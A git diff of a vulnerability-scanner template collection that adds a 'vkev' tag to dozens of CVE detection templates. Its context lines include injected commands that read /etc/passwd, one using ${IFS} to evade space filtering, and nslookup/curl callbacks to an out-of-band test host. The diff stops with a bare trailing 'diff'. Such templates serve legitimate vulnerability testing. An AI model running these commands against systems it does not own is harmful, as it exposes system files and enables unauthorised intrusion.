diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index 26798e003b6..b224056750a 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa,cms,cuppacms + tags: cve,cve2022,lfi,cuppa,cms,cuppacms,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index 09698c1bc27..fedbebd5bc4 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -32,7 +32,7 @@ info: - html:"SpaceLogic C-Bus" - http.html:"spacelogic c-bus" fofa-query: body="spacelogic c-bus" - tags: cve2022,cve,iot,spacelogic,rce,oast,packetstorm,schneider-electric + tags: cve2022,cve,iot,spacelogic,rce,oast,packetstorm,schneider-electric,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-3477.yaml b/http/cves/2022/CVE-2022-3477.yaml index 41125c82a6d..c0a1faf3103 100644 --- a/http/cves/2022/CVE-2022-3477.yaml +++ b/http/cves/2022/CVE-2022-3477.yaml @@ -24,7 +24,7 @@ info: vendor: newsmag_project product: newsmag framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,auth-bypass,tagdiv + tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,auth-bypass,tagdiv,vkev variables: email: "{{email}}" # victim's email address required. diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index 4c56ba710a7..e4c4738cb1a 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -33,7 +33,7 @@ info: - http.title:"manageengine" fofa-query: title="manageengine" google-query: intitle:"manageengine" - tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev,zohocorp + tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev,zohocorp,vkev http: - method: POST diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index 2b7b08e5671..f31c601ffc0 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -34,7 +34,7 @@ info: - http.title:"intelligent wapples" fofa-query: title="intelligent wapples" google-query: intitle:"intelligent wapples" - tags: cve,cve2022,wapples,firewall,default-login,pentasecurity + tags: cve,cve2022,wapples,firewall,default-login,pentasecurity,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-35653.yaml b/http/cves/2022/CVE-2022-35653.yaml index 1f235df6bea..4cf93c00dbc 100644 --- a/http/cves/2022/CVE-2022-35653.yaml +++ b/http/cves/2022/CVE-2022-35653.yaml @@ -31,7 +31,7 @@ info: - http.title:"moodle" fofa-query: title="moodle" google-query: intitle:"moodle" - tags: cve,cve2022,moodle,xss + tags: cve,cve2022,moodle,xss,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-3590.yaml b/http/cves/2022/CVE-2022-3590.yaml index e189b0535e4..257cb964ced 100644 --- a/http/cves/2022/CVE-2022-3590.yaml +++ b/http/cves/2022/CVE-2022-3590.yaml @@ -26,7 +26,7 @@ info: - cpe:"cpe:2.3:a:wordpress:wordpress" - http.component:"wordpress" fofa-query: body="oembed" && body="wp-" - tags: cve,cve2022,wordpress,wpscan,ssrf,oast,oob + tags: cve,cve2022,wordpress,wpscan,ssrf,oast,oob,vkev flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index c9769171585..61f412a1674 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -38,7 +38,7 @@ info: - icon_hash="-1474875778" - title="glpi" google-query: intitle:"glpi" - tags: cve,cve2022,glpi,rce,kev,glpi-project + tags: cve,cve2022,glpi,rce,kev,glpi-project,vkev variables: cmd: "cat+/etc/passwd" execFunc1: "system" diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index 2949fffad19..996401e564e 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -34,7 +34,7 @@ info: - http.title:"server backup manager" fofa-query: title="server backup manager" google-query: intitle:"server backup manager" - tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss + tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-36553.yaml b/http/cves/2022/CVE-2022-36553.yaml index ac471737248..6cf54319364 100644 --- a/http/cves/2022/CVE-2022-36553.yaml +++ b/http/cves/2022/CVE-2022-36553.yaml @@ -27,7 +27,7 @@ info: product: hwl-2511-ss_firmware fofa-query: title="index" && header="lighttpd/1.4.30" zoomeye-query: app="Hytec Inter HWL-2511-SS" - tags: cve2022,cve,hytec,rce + tags: cve2022,cve,hytec,rce,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index b7eae92bae4..ab284b06561 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -33,7 +33,7 @@ info: - http.title:"omnia mpx node | login" fofa-query: title="omnia mpx node | login" google-query: intitle:"omnia mpx node | login" - tags: cve,cve2022,traversal,omnia,edb,lfi,telosalliance + tags: cve,cve2022,traversal,omnia,edb,lfi,telosalliance,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index b05538c251c..27a8e746c2d 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -29,7 +29,7 @@ info: vendor: atlassian product: bitbucket shodan-query: http.component:"BitBucket" - tags: cve,cve2022,packetstorm,bitbucket,atlassian,kev + tags: cve,cve2022,packetstorm,bitbucket,atlassian,kev,vkev variables: data: '{{rand_base(5)}}' diff --git a/http/cves/2022/CVE-2022-37042.yaml b/http/cves/2022/CVE-2022-37042.yaml index cbee0f789f8..57616317414 100644 --- a/http/cves/2022/CVE-2022-37042.yaml +++ b/http/cves/2022/CVE-2022-37042.yaml @@ -33,7 +33,7 @@ info: - app="zimbra-邮件系统" - icon_hash="475145467" - icon_hash="1624375939" - tags: cve,cve2022,zimbra,rce,unauth,kev + tags: cve,cve2022,zimbra,rce,unauth,kev,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-37061.yaml b/http/cves/2022/CVE-2022-37061.yaml index 1827cca5d49..ae303a0d9f9 100644 --- a/http/cves/2022/CVE-2022-37061.yaml +++ b/http/cves/2022/CVE-2022-37061.yaml @@ -26,7 +26,7 @@ info: product: ax8 shodan-query: title:"FLIR" fofa-query: app="FLIR-AX8" - tags: cve,cve2022,flir,ax8,rce,authenticated + tags: cve,cve2022,flir,ax8,rce,authenticated,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml index efeb2d4894d..5e47cf2238c 100644 --- a/http/cves/2022/CVE-2022-37153.yaml +++ b/http/cves/2022/CVE-2022-37153.yaml @@ -31,7 +31,7 @@ info: - http.html:"Artica" - http.html:"artica" fofa-query: body="artica" - tags: cve,cve2022,xss,artica,articatech + tags: cve,cve2022,xss,artica,articatech,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index 515c67b1393..eb250b95ef9 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: shirne_cms_project product: shirne_cms - tags: cve,cve2022,shirnecms,lfi,shirne_cms_project + tags: cve,cve2022,shirnecms,lfi,shirne_cms_project,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index 33cead8e047..b24e691e00b 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -35,7 +35,7 @@ info: - icon_hash=-1274798165 - title="sophos mobile" google-query: intitle:"sophos mobile" - tags: cve,cve2022,xxe,ssrf,sophos + tags: cve,cve2022,xxe,ssrf,sophos,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index 901074e6327..155f87d785f 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -28,7 +28,7 @@ info: vendor: wpdevart product: booking_calendar framework: wordpress - tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart + tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart,vkev variables: string: "CVE-2022-3982" diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index bfefe0bd46d..100c5500e49 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -33,7 +33,7 @@ info: - http.title:"fortinac" fofa-query: title="fortinac" google-query: intitle:"fortinac" - tags: cve,cve2022,fortinet,fortinac,fileupload,rce,intrusive + tags: cve,cve2022,fortinet,fortinac,fileupload,rce,intrusive,vkev variables: boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}" diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index 7d95a3b831d..673ac914648 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -33,7 +33,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve,cve2022,atlassian,jira,netic,unauth + tags: cve,cve2022,atlassian,jira,netic,unauth,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index 8eaca4f0af2..5e01c81f626 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -31,7 +31,7 @@ info: product: raspap shodan-query: http.favicon.hash:-1465760059 fofa-query: icon_hash=-1465760059 - tags: cve,cve2022,packetstorm,raspap,rce + tags: cve,cve2022,packetstorm,raspap,rce,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index 128f4f9862d..4174d4cc74a 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -30,7 +30,7 @@ info: vendor: microchip product: syncserver_s650 shodan-query: html:"Symmetricom SyncServer" - tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip + tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index a23a075fd14..f5a73e696e5 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -30,7 +30,7 @@ info: vendor: beardev product: joomsport framework: wordpress - tags: time-based-sqli,cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev + tags: time-based-sqli,cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-4060.yaml b/http/cves/2022/CVE-2022-4060.yaml index 27a7764b47a..5e4487e26fe 100644 --- a/http/cves/2022/CVE-2022-4060.yaml +++ b/http/cves/2022/CVE-2022-4060.yaml @@ -30,7 +30,7 @@ info: vendor: odude product: user_post_gallery framework: wordpress - tags: cve,cve2022,unauth,wpscan,rce,wordpress,wp-plugin,wp,wp-upg,odude + tags: cve,cve2022,unauth,wpscan,rce,wordpress,wp-plugin,wp,wp-upg,odude,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index 6ee8e85c466..01dfa7e37f8 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -29,7 +29,7 @@ info: vendor: pluginus product: inpost_gallery framework: wordpress - tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus + tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-40684.yaml b/http/cves/2022/CVE-2022-40684.yaml index cbecd0715c7..54e25a3ab30 100644 --- a/http/cves/2022/CVE-2022-40684.yaml +++ b/http/cves/2022/CVE-2022-40684.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: fortinet product: fortiproxy - tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive + tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index 1bdd1af11cb..3fe58ccbe6c 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -33,7 +33,7 @@ info: - http.html:"Laravel Filemanager" - http.html:"laravel filemanager" fofa-query: body="laravel filemanager" - tags: cve,cve2022,laravel,unisharp,lfi,traversal + tags: cve,cve2022,laravel,unisharp,lfi,traversal,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index 41123578326..c4049432f34 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: tenda product: ac1200_v-w15ev2 - tags: cve2022,cve,tenda,auth-bypass,router,iot + tags: cve2022,cve,tenda,auth-bypass,router,iot,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index b9ce0f655fa..10e140715dc 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -32,7 +32,7 @@ info: shodan-query: - http.favicon.hash:"-244067125" - cpe:"cpe:2.3:h:contec:solarview_compact" - tags: cve,cve2022,solarview,rce,lfi,contec + tags: cve,cve2022,solarview,rce,lfi,contec,vkev variables: cmd: "cat${IFS}/etc/passwd" diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index 62c8071926f..3359e3e819c 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -30,7 +30,7 @@ info: vendor: iws-geo-form-fields_project product: iws-geo-form-fields framework: wordpress - tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan,iws-geo-form-fields_project + tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan,iws-geo-form-fields_project,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-41412.yaml b/http/cves/2022/CVE-2022-41412.yaml index e292371be30..e32b5b5d9a1 100644 --- a/http/cves/2022/CVE-2022-41412.yaml +++ b/http/cves/2022/CVE-2022-41412.yaml @@ -28,7 +28,7 @@ info: fofa-query: - title="perfSONAR Toolkit" - title="perfsonar toolkit" - tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar + tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-41800.yaml b/http/cves/2022/CVE-2022-41800.yaml index a162a132df5..5fac3cbba94 100644 --- a/http/cves/2022/CVE-2022-41800.yaml +++ b/http/cves/2022/CVE-2022-41800.yaml @@ -34,7 +34,7 @@ info: - body="big-ip apm" - title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" - tags: cve,cve2022,rce,f5,bigip,instrusive + tags: cve,cve2022,rce,f5,bigip,instrusive,vkev variables: auth: "admin:{{rand_text_alpha(1)}}" diff --git a/http/cves/2022/CVE-2022-41840.yaml b/http/cves/2022/CVE-2022-41840.yaml index de1338b79ac..d81752f75e4 100644 --- a/http/cves/2022/CVE-2022-41840.yaml +++ b/http/cves/2022/CVE-2022-41840.yaml @@ -29,7 +29,7 @@ info: vendor: collne product: welcart_e-commerce framework: wordpress - tags: cve2022,cve,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop,collne + tags: cve2022,cve,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop,collne,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-4328.yaml b/http/cves/2022/CVE-2022-4328.yaml index 751f70c5da7..5626ae3ce5a 100644 --- a/http/cves/2022/CVE-2022-4328.yaml +++ b/http/cves/2022/CVE-2022-4328.yaml @@ -25,7 +25,7 @@ info: vendor: najeebmedia product: woocommerce_checkout_field_manager framework: wordpress - tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia,fileupload + tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia,fileupload,vkev variables: string: "CVE-2022-4328" diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index fb18b60b7cb..f3f240b15dc 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -28,7 +28,7 @@ info: product: vantara_pentaho_business_analytics_server shodan-query: http.favicon.hash:1749354953 fofa-query: icon_hash=1749354953 - tags: cve,cve2022,packetstorm,rce,ssti,pentaho,hitachi,kev + tags: cve,cve2022,packetstorm,rce,ssti,pentaho,hitachi,kev,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml index 0df9e22c273..4e93e7a18c7 100644 --- a/http/cves/2022/CVE-2022-4447.yaml +++ b/http/cves/2022/CVE-2022-4447.yaml @@ -30,7 +30,7 @@ info: vendor: fontsy_project product: fontsy framework: wordpress - tags: cve,cve2022,wordpress,wp,wpscan,wp-plugin,sqli,fontsy,unauth,fontsy_project + tags: cve,cve2022,wordpress,wp,wpscan,wp-plugin,sqli,fontsy,unauth,fontsy_project,vkev variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index 469433bdedd..50211be1bda 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -34,7 +34,7 @@ info: - http.title:"login | control webpanel" fofa-query: title="login | control webpanel" google-query: intitle:"login | control webpanel" - tags: cve,cve2022,packetstorm,centos,rce,kev,control-webpanel + tags: cve,cve2022,packetstorm,centos,rce,kev,control-webpanel,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index cef84049c46..f3c7619bfab 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -32,7 +32,7 @@ info: - html:"/wp-content/plugins/download-monitor/" - http.html:"/wp-content/plugins/download-monitor/" fofa-query: body="/wp-content/plugins/download-monitor/" - tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp,wpchill + tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp,wpchill,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-45699.yaml b/http/cves/2022/CVE-2022-45699.yaml index e8d032eb183..8908968e75a 100644 --- a/http/cves/2022/CVE-2022-45699.yaml +++ b/http/cves/2022/CVE-2022-45699.yaml @@ -19,7 +19,7 @@ info: metadata: vendor: apsystems product: ecu-r_firmware - tags: cve,cve2022,rce,apsystems + tags: cve,cve2022,rce,apsystems,vkev flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-45808.yaml b/http/cves/2022/CVE-2022-45808.yaml index 02fb3f5f0b8..c4452e8dd4d 100644 --- a/http/cves/2022/CVE-2022-45808.yaml +++ b/http/cves/2022/CVE-2022-45808.yaml @@ -26,7 +26,7 @@ info: shodan-query: http.html:"/wp-content/plugins/learnpress" fofa-query: body="/wp-content/plugins/learnpress" publicwww-query: /wp-content/plugins/learnpress - tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,sqli,time-based-sqli + tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,sqli,time-based-sqli,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-45835.yaml b/http/cves/2022/CVE-2022-45835.yaml index 0a3207b0baa..cce2c4dad5b 100644 --- a/http/cves/2022/CVE-2022-45835.yaml +++ b/http/cves/2022/CVE-2022-45835.yaml @@ -28,7 +28,7 @@ info: vendor: phonepe product: phonepe framework: wordpress - tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,phonepe-payment-solutions,unauth,oast,phonepe + tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,phonepe-payment-solutions,unauth,oast,phonepe,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index 6a30882f635..06fdadd1b8f 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -35,7 +35,7 @@ info: - icon_hash=-379154636 - title="kubeview" google-query: intitle:"kubeview" - tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project + tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index afa1bf19743..763179e6fa6 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -41,7 +41,7 @@ info: google-query: - intitle:"cacti" - intitle:"login to cacti" - tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth + tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth,vkev variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index 46278a9c397..ac87db66c84 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -33,7 +33,7 @@ info: - http.html:"Linear eMerge" - http.html:"linear emerge" fofa-query: body="linear emerge" - tags: cve,cve2022,xss,emerge,linear,niceforyou + tags: cve,cve2022,xss,emerge,linear,niceforyou,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-47075.yaml b/http/cves/2022/CVE-2022-47075.yaml index 637fde31664..eacdc241cf2 100644 --- a/http/cves/2022/CVE-2022-47075.yaml +++ b/http/cves/2022/CVE-2022-47075.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: smartofficepayroll product: smartoffice - tags: cve,cve2022,packetstorm,smart-office,info,exposure,smartofficepayroll + tags: cve,cve2022,packetstorm,smart-office,info,exposure,smartofficepayroll,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-47501.yaml b/http/cves/2022/CVE-2022-47501.yaml index 64444c6ad44..739ee2105f8 100644 --- a/http/cves/2022/CVE-2022-47501.yaml +++ b/http/cves/2022/CVE-2022-47501.yaml @@ -32,7 +32,7 @@ info: - "app=\"Apache_OFBiz\"" - body="ofbiz" - app="apache_ofbiz" - tags: cve,cve2022,apache,ofbiz,lfi + tags: cve,cve2022,apache,ofbiz,lfi,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index fbf54da391e..719e7bc8f7e 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -32,7 +32,7 @@ info: shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" - tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress + tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index aafc2f81313..7802c104d23 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -37,7 +37,7 @@ info: - header="think_lang" - title="thinkphp" google-query: intitle:"thinkphp" - tags: cve,cve2022,thinkphp,lfi + tags: cve,cve2022,thinkphp,lfi,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index 8605d162414..9dcf25aac43 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -33,7 +33,7 @@ info: - http.title:"manageengine" fofa-query: title="manageengine" google-query: intitle:"manageengine" - tags: cve,cve2022,packetstorm,rce,zoho,manageengine,oast,kev,zohocorp + tags: cve,cve2022,packetstorm,rce,zoho,manageengine,oast,kev,zohocorp,vkev variables: cmd: 'nslookup {{interactsh-url}}' SAMLResponse: a H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000= RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw== diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index e4fd4f12c78..cdb6462255e 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -31,7 +31,7 @@ info: shodan-query: - html:"Aspera Faspex" - cpe:"cpe:2.3:o:linux:linux_kernel" - tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm,linux + tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm,linux,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-48164.yaml b/http/cves/2022/CVE-2022-48164.yaml index efeb666ae60..a1856661401 100644 --- a/http/cves/2022/CVE-2022-48164.yaml +++ b/http/cves/2022/CVE-2022-48164.yaml @@ -24,7 +24,7 @@ info: product: wl-wn533a8_firmware shodan-query: html:"WN533A8" fofa-query: body="WN533A8" - tags: cve,cve2022,wavlink,exposure,wn533a8 + tags: cve,cve2022,wavlink,exposure,wn533a8,vkev flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-4971.yaml b/http/cves/2022/CVE-2022-4971.yaml index c6566f5c24e..bb13338950b 100644 --- a/http/cves/2022/CVE-2022-4971.yaml +++ b/http/cves/2022/CVE-2022-4971.yaml @@ -28,7 +28,7 @@ info: fofa-query: body=/wp-content/plugins/sassy-social-share/ publicwww-query: /wp-content/plugins/sassy-social-share/ google-query: inurl:"/wp-content/plugins/sassy-social-share" - tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,sassy-social-share,xss,authenticated + tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,sassy-social-share,xss,authenticated,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-0037.yaml b/http/cves/2023/CVE-2023-0037.yaml index 26b854cfbc6..9f0ee3b4d9b 100644 --- a/http/cves/2023/CVE-2023-0037.yaml +++ b/http/cves/2023/CVE-2023-0037.yaml @@ -26,7 +26,7 @@ info: product: map_builder_for_google_maps framework: wordpress zoomeye-query: http.body="wp-content/plugins/wd-google-maps" - tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,wd-google-maps,sqli,time-based + tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,wd-google-maps,sqli,time-based,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-0159.yaml b/http/cves/2023/CVE-2023-0159.yaml index a9d53056534..138f52b2b67 100644 --- a/http/cves/2023/CVE-2023-0159.yaml +++ b/http/cves/2023/CVE-2023-0159.yaml @@ -28,7 +28,7 @@ info: shodan-query: "http.html:/wp-content/plugins/extensive-vc-addon/" fofa-query: "body=/wp-content/plugins/extensive-vc-addon/" publicwww-query: "/wp-content/plugins/extensive-vc-addon/" - tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon,wprealize + tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon,wprealize,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index c238fff7e85..2143cbd7cbb 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -42,7 +42,7 @@ info: - intitle:"login - pyload" - intitle:"pyload" zoomeye-query: app="pyLoad" - tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast + tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast,vkev variables: cmd: "curl {{interactsh-url}}" diff 